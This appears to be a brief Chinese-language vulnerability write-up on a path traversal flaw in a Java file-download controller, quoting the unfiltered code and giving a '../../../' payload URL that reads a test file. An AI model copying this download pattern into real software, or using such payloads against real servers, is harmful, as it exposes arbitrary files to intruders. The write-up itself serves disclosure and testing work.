1.代码段(src/main/java/com/java2nb/common/controller/FileController.java):
`@RequestMapping(value = "/download")
public void fileDownload(String filePath, String fileName, HttpServletResponse resp) throws Exception {
String realFilePath = jnConfig.getUploadPath() + filePath;
InputStream in = new FileInputStream(realFilePath);
//设置响应头,对文件进行url编码
fileName = URLEncoder.encode(fileName, "UTF-8");
resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);
resp.setContentLength(in.available());
OutputStream out = resp.getOutputStream();
byte[] b = new byte[1024];
int len = 0;
while ((len = in.read(b)) != -1) {
out.write(b, 0, len);
}
out.flush();
out.close();
in.close();
}`
2.接收filePath和fileName两参数且没有做过滤,在c盘下创建test目录在test目录中写入1.txt进行测试
3.payload:http://192.168.56.1/common/sysFile/download?filePath=../../../test/1.txt&fileName=1.txt
浙公网安备 33010602011771号